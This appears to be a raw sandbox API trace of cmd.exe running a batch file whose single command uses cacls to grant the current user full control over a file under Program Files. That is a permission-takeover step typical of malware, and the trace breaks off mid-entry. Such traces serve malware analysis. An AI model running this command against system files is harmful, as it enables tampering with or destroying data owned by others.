GetFileAttributesW (lpFileName="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ch81ANBE.bat\"" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\\"c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ch81anbe.bat\"")) returned 0xffffffff [0222.203] _wcsicmp (_String1="\"C", _String2="DIR") returned -66 [0222.203] _wcsicmp (_String1="\"C", _String2="ERASE") returned -67 [0222.203] _wcsicmp (_String1="\"C", _String2="DEL") returned -66 [0222.203] _wcsicmp (_String1="\"C", _String2="TYPE") returned -82 [0222.203] _wcsicmp (_String1="\"C", _String2="COPY") returned -65 [0222.203] _wcsicmp (_String1="\"C", _String2="CD") returned -65 [0222.203] _wcsicmp (_String1="\"C", _String2="CHDIR") returned -65 [0222.203] _wcsicmp (_String1="\"C", _String2="RENAME") returned -80 [0222.203] _wcsicmp (_String1="\"C", _String2="REN") returned -80 [0222.203] _wcsicmp (_String1="\"C", _String2="ECHO") returned -67 [0222.203] _wcsicmp (_String1="\"C", _String2="SET") returned -81 [0222.203] _wcsicmp (_String1="\"C", _String2="PAUSE") returned -78 [0222.203] _wcsicmp (_String1="\"C", _String2="DATE") returned -66 [0222.203] _wcsicmp (_String1="\"C", _String2="TIME") returned -82 [0222.203] _wcsicmp (_String1="\"C", _String2="PROMPT") returned -78 [0222.203] _wcsicmp (_String1="\"C", _String2="MD") returned -75 [0222.203] _wcsicmp (_String1="\"C", _String2="MKDIR") returned -75 [0222.203] _wcsicmp (_String1="\"C", _String2="RD") returned -80 [0222.204] _wcsicmp (_String1="\"C", _String2="RMDIR") returned -80 [0222.204] _wcsicmp (_String1="\"C", _String2="PATH") returned -78 [0222.204] _wcsicmp (_String1="\"C", _String2="GOTO") returned -69 [0222.204] _wcsicmp (_String1="\"C", _String2="SHIFT") returned -81 [0222.204] _wcsicmp (_String1="\"C", _String2="CLS") returned -65 [0222.204] _wcsicmp (_String1="\"C", _String2="CALL") returned -65 [0222.204] _wcsicmp (_String1="\"C", _String2="VERIFY") returned -84 [0222.204] _wcsicmp (_String1="\"C", _String2="VER") returned -84 [0222.204] _wcsicmp (_String1="\"C", _String2="VOL") returned -84 [0222.204] _wcsicmp (_String1="\"C", _String2="EXIT") returned -67 [0222.204] _wcsicmp (_String1="\"C", _String2="SETLOCAL") returned -81 [0222.204] _wcsicmp (_String1="\"C", _String2="ENDLOCAL") returned -67 [0222.204] _wcsicmp (_String1="\"C", _String2="TITLE") returned -82 [0222.204] _wcsicmp (_String1="\"C", _String2="START") returned -81 [0222.204] _wcsicmp (_String1="\"C", _String2="DPATH") returned -66 [0222.204] _wcsicmp (_String1="\"C", _String2="KEYS") returned -73 [0222.204] _wcsicmp (_String1="\"C", _String2="MOVE") returned -75 [0222.204] _wcsicmp (_String1="\"C", _String2="PUSHD") returned -78 [0222.204] _wcsicmp (_String1="\"C", _String2="POPD") returned -78 [0222.205] _wcsicmp (_String1="\"C", _String2="ASSOC") returned -63 [0222.205] _wcsicmp (_String1="\"C", _String2="FTYPE") returned -68 [0222.205] _wcsicmp (_String1="\"C", _String2="BREAK") returned -64 [0222.205] _wcsicmp (_String1="\"C", _String2="COLOR") returned -65 [0222.205] _wcsicmp (_String1="\"C", _String2="MKLINK") returned -75 [0222.205] _wcsicmp (_String1="\"C", _String2="DIR") returned -66 [0222.205] _wcsicmp (_String1="\"C", _String2="ERASE") returned -67 [0222.205] _wcsicmp (_String1="\"C", _String2="DEL") returned -66 [0222.205] _wcsicmp (_String1="\"C", _String2="TYPE") returned -82 [0222.205] _wcsicmp (_String1="\"C", _String2="COPY") returned -65 [0222.205] _wcsicmp (_String1="\"C", _String2="CD") returned -65 [0222.205] _wcsicmp (_String1="\"C", _String2="CHDIR") returned -65 [0222.205] _wcsicmp (_String1="\"C", _String2="RENAME") returned -80 [0222.205] _wcsicmp (_String1="\"C", _String2="REN") returned -80 [0222.205] _wcsicmp (_String1="\"C", _String2="ECHO") returned -67 [0222.205] _wcsicmp (_String1="\"C", _String2="SET") returned -81 [0222.205] _wcsicmp (_String1="\"C", _String2="PAUSE") returned -78 [0222.205] _wcsicmp (_String1="\"C", _String2="DATE") returned -66 [0222.205] _wcsicmp (_String1="\"C", _String2="TIME") returned -82 [0222.205] _wcsicmp (_String1="\"C", _String2="PROMPT") returned -78 [0222.205] _wcsicmp (_String1="\"C", _String2="MD") returned -75 [0222.205] _wcsicmp (_String1="\"C", _String2="MKDIR") returned -75 [0222.205] _wcsicmp (_String1="\"C", _String2="RD") returned -80 [0222.205] _wcsicmp (_String1="\"C", _String2="RMDIR") returned -80 [0222.205] _wcsicmp (_String1="\"C", _String2="PATH") returned -78 [0222.205] _wcsicmp (_String1="\"C", _String2="GOTO") returned -69 [0222.206] _wcsicmp (_String1="\"C", _String2="SHIFT") returned -81 [0222.206] _wcsicmp (_String1="\"C", _String2="CLS") returned -65 [0222.206] _wcsicmp (_String1="\"C", _String2="CALL") returned -65 [0222.206] _wcsicmp (_String1="\"C", _String2="VERIFY") returned -84 [0222.206] _wcsicmp (_String1="\"C", _String2="VER") returned -84 [0222.206] _wcsicmp (_String1="\"C", _String2="VOL") returned -84 [0222.206] _wcsicmp (_String1="\"C", _String2="EXIT") returned -67 [0222.206] _wcsicmp (_String1="\"C", _String2="SETLOCAL") returned -81 [0222.206] _wcsicmp (_String1="\"C", _String2="ENDLOCAL") returned -67 [0222.206] _wcsicmp (_String1="\"C", _String2="TITLE") returned -82 [0222.206] _wcsicmp (_String1="\"C", _String2="START") returned -81 [0222.206] _wcsicmp (_String1="\"C", _String2="DPATH") returned -66 [0222.206] _wcsicmp (_String1="\"C", _String2="KEYS") returned -73 [0222.206] _wcsicmp (_String1="\"C", _String2="MOVE") returned -75 [0222.206] _wcsicmp (_String1="\"C", _String2="PUSHD") returned -78 [0222.206] _wcsicmp (_String1="\"C", _String2="POPD") returned -78 [0222.206] _wcsicmp (_String1="\"C", _String2="ASSOC") returned -63 [0222.206] _wcsicmp (_String1="\"C", _String2="FTYPE") returned -68 [0222.206] _wcsicmp (_String1="\"C", _String2="BREAK") returned -64 [0222.206] _wcsicmp (_String1="\"C", _String2="COLOR") returned -65 [0222.206] _wcsicmp (_String1="\"C", _String2="MKLINK") returned -75 [0222.206] _wcsicmp (_String1="\"C", _String2="FOR") returned -68 [0222.206] _wcsicmp (_String1="\"C", _String2="IF") returned -71 [0222.206] _wcsicmp (_String1="\"C", _String2="REM") returned -80 [0222.207] GetProcessHeap () returned 0x460000 [0222.207] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x8, Size=0x210) returned 0x473278 [0222.207] GetProcessHeap () returned 0x460000 [0222.207] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x8, Size=0xee) returned 0x473490 [0222.210] _wcsnicmp (_String1="C:\\U", _String2="cmd ", _MaxCount=0x4) returned -51 [0222.210] GetProcessHeap () returned 0x460000 [0222.210] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x8, Size=0x418) returned 0x4607f0 [0222.210] SetErrorMode (uMode=0x0) returned 0x0 [0222.210] SetErrorMode (uMode=0x1) returned 0x0 [0222.210] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\.", nBufferLength=0x208, lpBuffer=0x4607f8, lpFilePart=0x3def60 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x3def60*="Desktop") returned 0x25 [0222.210] SetErrorMode (uMode=0x0) returned 0x1 [0222.210] GetProcessHeap () returned 0x460000 [0222.210] RtlReAllocateHeap (Heap=0x460000, Flags=0x0, Ptr=0x4607f0, Size=0x6e) returned 0x4607f0 [0222.210] GetProcessHeap () returned 0x460000 [0222.210] RtlSizeHeap (HeapHandle=0x460000, Flags=0x0, MemoryPointer=0x4607f0) returned 0x6e [0222.211] NeedCurrentDirectoryForExePathW (ExeName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\.") returned 1 [0222.211] GetProcessHeap () returned 0x460000 [0222.211] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x8, Size=0x5a) returned 0x473588 [0222.211] GetProcessHeap () returned 0x460000 [0222.211] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x8, Size=0xa8) returned 0x4735f0 [0222.211] GetProcessHeap () returned 0x460000 [0222.211] RtlReAllocateHeap (Heap=0x460000, Flags=0x0, Ptr=0x4735f0, Size=0x5a) returned 0x4735f0 [0222.211] GetProcessHeap () returned 0x460000 [0222.211] RtlSizeHeap (HeapHandle=0x460000, Flags=0x0, MemoryPointer=0x4735f0) returned 0x5a [0222.211] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x49dd0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0222.211] GetProcessHeap () returned 0x460000 [0222.211] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x8, Size=0xe0) returned 0x460868 [0222.219] GetProcessHeap () returned 0x460000 [0222.219] RtlReAllocateHeap (Heap=0x460000, Flags=0x0, Ptr=0x460868, Size=0x76) returned 0x460868 [0222.219] GetProcessHeap () returned 0x460000 [0222.219] RtlSizeHeap (HeapHandle=0x460000, Flags=0x0, MemoryPointer=0x460868) returned 0x76 [0222.219] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0222.220] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ch81ANBE.bat", fInfoLevelId=0x1, lpFindFileData=0x3decfc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3decfc) returned 0x473658 [0222.220] GetProcessHeap () returned 0x460000 [0222.220] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x0, Size=0x14) returned 0x473698 [0222.220] FindClose (in: hFindFile=0x473658 | out: hFindFile=0x473658) returned 1 [0222.220] _wcsicmp (_String1=".bat", _String2=".CMD") returned -1 [0222.220] _wcsicmp (_String1=".bat", _String2=".BAT") returned 0 [0222.221] GetConsoleTitleW (in: lpConsoleTitle=0x3df1d4, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0222.539] GetProcessHeap () returned 0x460000 [0222.539] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x8, Size=0x11c) returned 0x4608e8 [0222.539] LoadLibraryExA (lpLibFileName="ADVAPI32.dll", hFile=0x0, dwFlags=0x0) returned 0x77710000 [0222.539] GetProcAddress (hModule=0x77710000, lpProcName="SaferIdentifyLevel") returned 0x77732102 [0222.540] IdentifyCodeAuthzLevelW () returned 0x1 [0222.550] GetProcAddress (hModule=0x77710000, lpProcName="SaferComputeTokenFromLevel") returned 0x77733352 [0222.550] ComputeAccessTokenFromCodeAuthzLevel () returned 0x1 [0222.551] GetProcAddress (hModule=0x77710000, lpProcName="SaferCloseLevel") returned 0x77733825 [0222.551] CloseCodeAuthzLevel () returned 0x1 [0222.551] SetErrorMode (uMode=0x0) returned 0x0 [0222.551] SetErrorMode (uMode=0x1) returned 0x0 [0222.551] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ch81ANBE.bat", nBufferLength=0x104, lpBuffer=0x473280, lpFilePart=0x3df0c0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ch81ANBE.bat", lpFilePart=0x3df0c0*="Ch81ANBE.bat") returned 0x32 [0222.551] SetErrorMode (uMode=0x0) returned 0x1 [0222.551] GetProcessHeap () returned 0x460000 [0222.551] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x8, Size=0x72) returned 0x482bd0 [0222.552] wcsspn (_String=" \"C:\\Program Files\\Windows Journal\\Templates\\Dotted_Line.jtp\"", _Control=" \x09") returned 0x1 [0222.552] GetProcessHeap () returned 0x460000 [0222.552] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x8, Size=0x82) returned 0x461140 [0222.552] GetProcessHeap () returned 0x460000 [0222.552] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x8, Size=0xfc) returned 0x484b38 [0222.552] GetProcessHeap () returned 0x460000 [0222.552] RtlReAllocateHeap (Heap=0x460000, Flags=0x0, Ptr=0x484b38, Size=0x84) returned 0x484b38 [0222.552] GetProcessHeap () returned 0x460000 [0222.552] RtlSizeHeap (HeapHandle=0x460000, Flags=0x0, MemoryPointer=0x484b38) returned 0x84 [0222.552] CmdBatNotification () returned 0x4732e2 [0222.552] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ch81ANBE.bat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ch81anbe.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x3df104, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x78 [0222.553] _open_osfhandle (_OSFileHandle=0x78, _Flags=8) returned 3 [0222.553] _get_osfhandle (_FileHandle=3) returned 0x78 [0222.553] SetFilePointer (in: hFile=0x78, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0222.554] _get_osfhandle (_FileHandle=3) returned 0x78 [0222.554] SetFilePointer (in: hFile=0x78, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0222.554] ReadFile (in: hFile=0x78, lpBuffer=0x49dc6640, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x3df0e8, lpOverlapped=0x0 | out: lpBuffer=0x49dc6640*, lpNumberOfBytesRead=0x3df0e8*=0xe2, lpOverlapped=0x0) returned 1 [0222.556] SetFilePointer (in: hFile=0x78, lDistanceToMove=32, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x20 [0222.556] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x49dc6640, cbMultiByte=32, lpWideCharStr=0x49dcc640, cchWideChar=8191 | out: lpWideCharStr="cacls %1 /E /G %USERNAME%:F /C\r\n") returned 32 [0222.559] _get_osfhandle (_FileHandle=3) returned 0x78 [0222.559] GetFileType (hFile=0x78) returned 0x1 [0222.559] _get_osfhandle (_FileHandle=3) returned 0x78 [0222.559] SetFilePointer (in: hFile=0x78, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x20 [0222.559] GetProcessHeap () returned 0x460000 [0222.559] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x8, Size=0x400a) returned 0x476b00 [0222.559] GetProcessHeap () returned 0x460000 [0222.559] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x8, Size=0x4008) returned 0x484bc8 [0222.560] GetProcessHeap () returned 0x460000 [0222.560] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x8, Size=0x1a) returned 0x475850 [0222.560] GetEnvironmentVariableW (in: lpName="USERNAME", lpBuffer=0x49dd0640, nSize=0x2000 | out: lpBuffer="5p5NrGJn0jS HALPmcxz") returned 0x14 [0222.560] GetProcessHeap () returned 0x460000 [0222.560] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x475850 | out: hHeap=0x460000) returned 1 [0222.560] GetProcessHeap () returned 0x460000 [0222.560] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x484bc8 | out: hHeap=0x460000) returned 1 [0222.560] GetProcessHeap () returned 0x460000 [0222.560] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x476b00 | out: hHeap=0x460000) returned 1 [0222.561] _wcsicmp (_String1="cacls", _String2=")") returned 58 [0222.561] _wcsicmp (_String1="FOR", _String2="cacls") returned 3 [0222.561] _wcsicmp (_String1="FOR/?", _String2="cacls") returned 3 [0222.562] _wcsicmp (_String1="IF", _String2="cacls") returned 6 [0222.562] _wcsicmp (_String1="IF/?", _String2="cacls") returned 6 [0222.562] _wcsicmp (_String1="REM", _String2="cacls") returned 15 [0222.562] _wcsicmp (_String1="REM/?", _String2="cacls") returned 15 [0222.562] GetProcessHeap () returned 0x460000 [0222.562] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x8, Size=0x58) returned 0x4611d0 [0222.562] GetProcessHeap () returned 0x460000 [0222.562] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x8, Size=0x14) returned 0x461230 [0222.567] GetProcessHeap () returned 0x460000 [0222.567] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x8, Size=0xc4) returned 0x4741a0 [0222.569] _tell (_FileHandle=3) returned 32 [0222.569] _close (_FileHandle=3) returned 0 [0222.569] _vsnwprintf (in: _Buffer=0x49dd4640, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x3deebc | out: _Buffer="\r\n") returned 2 [0222.570] _get_osfhandle (_FileHandle=1) returned 0x7 [0222.570] GetFileType (hFile=0x7) returned 0x2 [0223.181] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0223.182] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x3dee7c | out: lpMode=0x3dee7c) returned 1 [0223.182] _get_osfhandle (_FileHandle=1) returned 0x7 [0223.183] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49dd4640*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x3deea8, lpReserved=0x0 | out: lpBuffer=0x49dd4640*, lpNumberOfCharsWritten=0x3deea8*=0x2) returned 1 [0223.184] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x49dd0640, nSize=0x2000 | out: lpBuffer="$P$G") returned 0x4 [0223.184] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x49dc5260 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0223.184] _vsnwprintf (in: _Buffer=0x49dc5e40, _BufferCount=0x3fe, _Format="%s", _ArgList=0x3deeb8 | out: _Buffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 37 [0223.184] _vsnwprintf (in: _Buffer=0x49dc5e8a, _BufferCount=0x3d9, _Format="%c", _ArgList=0x3deeb8 | out: _Buffer=">") returned 1 [0223.184] _get_osfhandle (_FileHandle=1) returned 0x7 [0223.184] GetFileType (hFile=0x7) returned 0x2 [0223.185] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0223.185] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x3dee80 | out: lpMode=0x3dee80) returned 1 [0223.185] _get_osfhandle (_FileHandle=1) returned 0x7 [0223.185] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49dc5e40*, nNumberOfCharsToWrite=0x26, lpNumberOfCharsWritten=0x3deeac, lpReserved=0x0 | out: lpBuffer=0x49dc5e40*, lpNumberOfCharsWritten=0x3deeac*=0x26) returned 1 [0223.187] _get_osfhandle (_FileHandle=1) returned 0x7 [0223.187] GetFileType (hFile=0x7) returned 0x2 [0223.188] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0223.188] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x3df104 | out: lpMode=0x3df104) returned 1 [0223.188] _get_osfhandle (_FileHandle=1) returned 0x7 [0223.188] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x461238*, nNumberOfCharsToWrite=0x5, lpNumberOfCharsWritten=0x3df130, lpReserved=0x0 | out: lpBuffer=0x461238*, lpNumberOfCharsWritten=0x3df130*=0x5) returned 1 [0223.189] _vsnwprintf (in: _Buffer=0x49dd4640, _BufferCount=0x1fff, _Format="%s ", _ArgList=0x3df13c | out: _Buffer=" \"C:\\Program Files\\Windows Journal\\Templates\\Dotted_Line.jtp\" /E /G 5p5NrGJn0jS HALPmcxz:F /C ") returned 94 [0223.189] _get_osfhandle (_FileHandle=1) returned 0x7 [0223.189] GetFileType (hFile=0x7) returned 0x2 [0223.189] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0223.189] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x3df0fc | out: lpMode=0x3df0fc) returned 1 [0223.189] _get_osfhandle (_FileHandle=1) returned 0x7 [0223.190] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49dd4640*, nNumberOfCharsToWrite=0x5e, lpNumberOfCharsWritten=0x3df128, lpReserved=0x0 | out: lpBuffer=0x49dd4640*, lpNumberOfCharsWritten=0x3df128*=0x5e) returned 1 [0223.190] _vsnwprintf (in: _Buffer=0x49dd4640, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x3df15c | out: _Buffer="\r\n") returned 2 [0223.190] _get_osfhandle (_FileHandle=1) returned 0x7 [0223.190] GetFileType (hFile=0x7) returned 0x2 [0223.191] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0223.191] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x3df11c | out: lpMode=0x3df11c) returned 1 [0223.191] _get_osfhandle (_FileHandle=1) returned 0x7 [0223.191] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49dd4640*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x3df148, lpReserved=0x0 | out: lpBuffer=0x49dd4640*, lpNumberOfCharsWritten=0x3df148*=0x2) returned 1 [0223.191] _wcsicmp (_String1="cacls", _String2="DIR") returned -1 [0223.191] _wcsicmp (_String1="cacls", _String2="ERASE") returned -2 [0223.192] _wcsicmp (_String1="cacls", _String2="DEL") returned -1 [0223.192] _wcsicmp (_String1="cacls", _String2="TYPE") returned -17 [0223.192] _wcsicmp (_String1="cacls", _String2="COPY") returned -14 [0223.192] _wcsicmp (_String1="cacls", _String2="CD") returned -3 [0223.192] _wcsicmp (_String1="cacls", _String2="CHDIR") returned -7 [0223.192] _wcsicmp (_String1="cacls", _String2="RENAME") returned -15 [0223.192] _wcsicmp (_String1="cacls", _String2="REN") returned -15 [0223.192] _wcsicmp (_String1="cacls", _String2="ECHO") returned -2 [0223.192] _wcsicmp (_String1="cacls", _String2="SET") returned -16 [0223.192] _wcsicmp (_String1="cacls", _String2="PAUSE") returned -13 [0223.192] _wcsicmp (_String1="cacls", _String2="DATE") returned -1 [0223.192] _wcsicmp (_String1="cacls", _String2="TIME") returned -17 [0223.192] _wcsicmp (_String1="cacls", _String2="PROMPT") returned -13 [0223.192] _wcsicmp (_String1="cacls", _String2="MD") returned -10 [0223.192] _wcsicmp (_String1="cacls", _String2="MKDIR") returned -10 [0223.192] _wcsicmp (_String1="cacls", _String2="RD") returned -15 [0223.192] _wcsicmp (_String1="cacls", _String2="RMDIR") returned -15 [0223.192] _wcsicmp (_String1="cacls", _String2="PATH") returned -13 [0223.192] _wcsicmp (_String1="cacls", _String2="GOTO") returned -4 [0223.192] _wcsicmp (_String1="cacls", _String2="SHIFT") returned -16 [0223.192] _wcsicmp (_String1="cacls", _String2="CLS") returned -11 [0223.193] _wcsicmp (_String1="cacls", _String2="CALL") returned -9 [0223.193] _wcsicmp (_String1="cacls", _String2="VERIFY") returned -19 [0223.193] _wcsicmp (_String1="cacls", _String2="VER") returned -19 [0223.193] _wcsicmp (_String1="cacls", _String2="VOL") returned -19 [0223.193] _wcsicmp (_String1="cacls", _String2="EXIT") returned -2 [0223.193] _wcsicmp (_String1="cacls", _String2="SETLOCAL") returned -16 [0223.193] _wcsicmp (_String1="cacls", _String2="ENDLOCAL") returned -2 [0223.193] _wcsicmp (_String1="cacls", _String2="TITLE") returned -17 [0223.193] _wcsicmp (_String1="cacls", _String2="START") returned -16 [0223.193] _wcsicmp (_String1="cacls", _String2="DPATH") returned -1 [0223.193] _wcsicmp (_String1="cacls", _String2="KEYS") returned -8 [0223.193] _wcsicmp (_String1="cacls", _String2="MOVE") returned -10 [0223.193] _wcsicmp (_String1="cacls", _String2="PUSHD") returned -13 [0223.193] _wcsicmp (_String1="cacls", _String2="POPD") returned -13 [0223.193] _wcsicmp (_String1="cacls", _String2="ASSOC") returned 2 [0223.193] _wcsicmp (_String1="cacls", _String2="FTYPE") returned -3 [0223.193] _wcsicmp (_String1="cacls", _String2="BREAK") returned 1 [0223.193] _wcsicmp (_String1="cacls", _String2="COLOR") returned -14 [0223.193] _wcsicmp (_String1="cacls", _String2="MKLINK") returned -10 [0223.194] _wcsnicmp (_String1="cacl", _String2="cmd ", _MaxCount=0x4) returned -12 [0223.194] GetProcessHeap () returned 0x460000 [0223.194] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x8, Size=0x418) returned 0x474270 [0223.194] SetErrorMode (uMode=0x0) returned 0x0 [0223.194] SetErrorMode (uMode=0x1) returned 0x0 [0223.194] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x474278, lpFilePart=0x3def00 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x3def00*="Desktop") returned 0x25 [0223.194] SetErrorMode (uMode=0x0) returned 0x1 [0223.194] GetProcessHeap () returned 0x460000 [0223.194] RtlReAllocateHeap (Heap=0x460000, Flags=0x0, Ptr=0x474270, Size=0x60) returned 0x474270 [0223.194] GetProcessHeap () returned 0x460000 [0223.194] RtlSizeHeap (HeapHandle=0x460000, Flags=0x0, MemoryPointer=0x474270) returned 0x60 [0223.194] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x49dd0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0223.195] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0223.195] GetProcessHeap () returned 0x460000 [0223.195] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x8, Size=0x120) returned 0x4742d8 [0223.195] GetProcessHeap () returned 0x460000 [0223.195] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x8, Size=0x238) returned 0x474400 [0223.198] GetConsoleTitleW (in: lpConsoleTitle=0x3deccc, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0223.199] GetConsoleTitleW (in: lpConsoleTitle=0x3dea60, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0223.199] InitializeProcThreadAttributeList (in: lpAttributeList=0x3de8e8, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x3de9b0 | out: lpAttributeList=0x3de8e8, lpSize=0x3de9b0) returned 1 [0223.199] UpdateProcThreadAttribute (in: lpAttributeList=0x3de8e8, dwFlags=0x0, Attribute=0x60001, lpValue=0x3de9a8, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x3de8e8, lpPreviousValue=0x0) returned 1 [0223.200] GetStartupInfoW (in: lpStartupInfo=0x3de8a4 | out: lpStartupInfo=0x3de8a4*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0223.220] CloseHandle (hObject=0x78) returned 1 [0223.220] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0223.220] GetProcessHeap () returned 0x460000 [0223.220] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x475fc0 | out: hHeap=0x460000) returned 1 [0223.220] GetEnvironmentStringsW () returned 0x475fc0* [0223.220] GetProcessHeap () returned 0x460000 [0223.220] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x8, Size=0xb36) returned 0x476b00 [0223.221] FreeEnvironmentStringsW (penv=0x475fc0) returned 1 [0223.221] WaitForSingleObject (hHandle=0x74, dwMilliseconds=0xffffffff) returned 0x0 [0231.131] GetExitCodeProcess (in: hProcess=0x74, lpExitCode=0x3de884 | out: lpExitCode=0x3de884*=0x1f57) returned 1 [0231.131] CloseHandle (hObject=0x74) returned 1 [0231.131] _vsnwprintf (in: _Buffer=0x3de9cc, _BufferCount=0x13, _Format="%08X", _ArgList=0x3de890 | out: _Buffer="00001F57") returned 8 [0231.131] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00001F57") returned 1 [0231.131] GetProcessHeap () returned 0x460000 [0231.131] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x476b00 | out: hHeap=0x460000) returned 1 [0231.131] GetEnvironmentStringsW () returned 0x475fc0* [0231.131] GetProcessHeap () returned 0x460000 [0231.131] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x8, Size=0xb5c) returned 0x4781a8 [0231.131] FreeEnvironmentStringsW (penv=0x475fc0) returned 1 [0231.131] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0231.131] GetProcessHeap () returned 0x460000 [0231.131] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x4781a8 | out: hHeap=0x460000) returned 1 [0231.132] GetEnvironmentStringsW () returned 0x475fc0* [0231.132] GetProcessHeap () returned 0x460000 [0231.132] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x8, Size=0xb5c) returned 0x4781a8 [0231.132] FreeEnvironmentStringsW (penv=0x475fc0) returned 1 [0231.132] GetProcessHeap () returned 0x460000 [0231.132] HeapFree (in: 